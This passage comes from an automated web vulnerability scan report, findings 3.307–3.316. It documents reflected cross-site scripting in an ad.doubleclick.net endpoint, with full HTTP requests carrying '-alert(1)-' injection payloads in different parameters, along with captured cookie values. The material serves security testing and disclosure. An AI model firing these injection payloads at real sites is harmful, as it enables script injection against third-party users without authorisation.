Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:38:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h%3Dv8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253Ace609"-alert(1)-"db184f4d2ae&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011
...[SNIP]...

3.307. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [oepartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42909"-alert(1)-"8ac8572b64a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=42909"-alert(1)-"8ac8572b64a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=42909"-alert(1)-"8ac8572b64a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177
...[SNIP]...

3.308. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b99c"-alert(1)-"24ca76604f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=6b99c"-alert(1)-"24ca76604f&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6853

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=6b99c"-alert(1)-"24ca76604f&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/vi
...[SNIP]...

3.309. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f5ce"-alert(1)-"7eba0b485fe was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=4f5ce"-alert(1)-"7eba0b485fe&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=4f5ce"-alert(1)-"7eba0b485fe&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.2
...[SNIP]...

3.310. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19553"-alert(1)-"12d273e210a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=19553"-alert(1)-"12d273e210a&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=19553"-alert(1)-"12d273e210a&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
...[SNIP]...

3.311. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b7a"-alert(1)-"a9c10cfd983 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAEd2b7a"-alert(1)-"a9c10cfd983&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAEd2b7a"-alert(1)-"a9c10cfd983&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

3.312. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6d22"-alert(1)-"87db701de97 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=e6d22"-alert(1)-"87db701de97&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=e6d22"-alert(1)-"87db701de97&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.game
...[SNIP]...

3.313. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8d5"-alert(1)-"ea077636822 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100cc8d5"-alert(1)-"ea077636822&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:40:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
39386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100cc8d5"-alert(1)-"ea077636822&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbo
...[SNIP]...

3.314. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32d3b"-alert(1)-"9533bc3329c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=32d3b"-alert(1)-"9533bc3329c&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:41:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=32d3b"-alert(1)-"9533bc3329c&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%
...[SNIP]...

3.315. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdf71"-alert(1)-"8c1296a649d was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000bdf71"-alert(1)-"8c1296a649d&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:39:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000bdf71"-alert(1)-"8c1296a649d&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http:
...[SNIP]...

3.316. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5996.2496.0512158326521/B5372452.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b35f8"-alert(1)-"3d6c7297d10 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b35f8"-alert(1)-"3d6c7297d10&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:42:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6857

